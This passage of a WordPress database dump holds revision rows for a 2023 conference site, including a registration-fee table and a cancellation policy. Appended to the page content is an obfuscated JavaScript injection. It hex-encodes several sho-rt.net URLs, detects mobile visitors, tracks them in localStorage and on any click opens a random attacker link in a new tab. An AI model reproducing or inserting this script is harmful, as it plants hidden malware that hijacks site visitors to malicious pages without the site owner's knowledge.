os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-02-04 06:31:50','2023-02-04 06:31:50','',2665,'https://gsw2023.com/?p=3761',0,'revision','',0),
(3762,1,'2023-02-04 06:46:03','2023-02-04 06:46:03','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h1 style=\"text-align: justify; color: gray;\"><strong><span style=\"font-size: 22px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h1>\n<div class=\"three_quarter first\">\n<section class=\"clear\"><span style=\"font-size: 12pt;\"><strong>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</strong></span></p>\n</section>\n</div>\n<p>[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: justify; color: red;\">Standard and student / senior (over 65) registration fees include:</p>\n<ul class=\"nospace\">\n<li><strong>Entry to all sessions/workshops;</strong></li>\n<li><strong>Entry to the Exhibition;</strong></li>\n<li><strong>Copy of Final Programme;</strong></li>\n<li><strong>Morning and Afternoon Tea/Coffee breaks;</strong></li>\n<li><strong>Lunches;</strong></li>\n<li><strong>Attendance at Welcome Reception;</strong></li>\n<li><strong>Attendance at Exhibitors Reception;</strong></li>\n</ul>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\"> Accompanying person fee includes:</h5>\n<ul>\n<li><strong>Entry to Opening Session;</strong></li>\n<li><strong>Attendance at Welcome Reception;</strong></li>\n<li><strong>Attendance at Exhibitors Reception;</strong></li>\n<li><strong>Morning and Afternoon Tea/Coffee breaks;</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: red;\">Cancellation policy:</h5>\n<ul>\n<li>\n<h6>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</h6>\n</li>\n</ul>\n<h5 style=\"text-align: justify; color: red;\">-Two Social Dinners Will Be Organized On Tuesday And Thursday.</h5>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-02-04 06:46:03','2023-02-04 06:46:03','',2638,'https://gsw2023.com/?p=3762',0,'revision','',0),
(3763,1,'2023-02-04 06:54:45','2023-02-04 06:54:45','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h1 style=\"text-align: justify; color: gray;\"><strong><span style=\"font-size: 22px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h1>\n<div class=\"three_quarter first\">\n<section class=\"clear\"><span style=\"font-size: 12pt;\"><strong>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</strong></span></p>\n</section>\n</div>\n<p>[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; color: black;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]&nbsp;</p>\n<h5 style=\"text-align: justify; color: 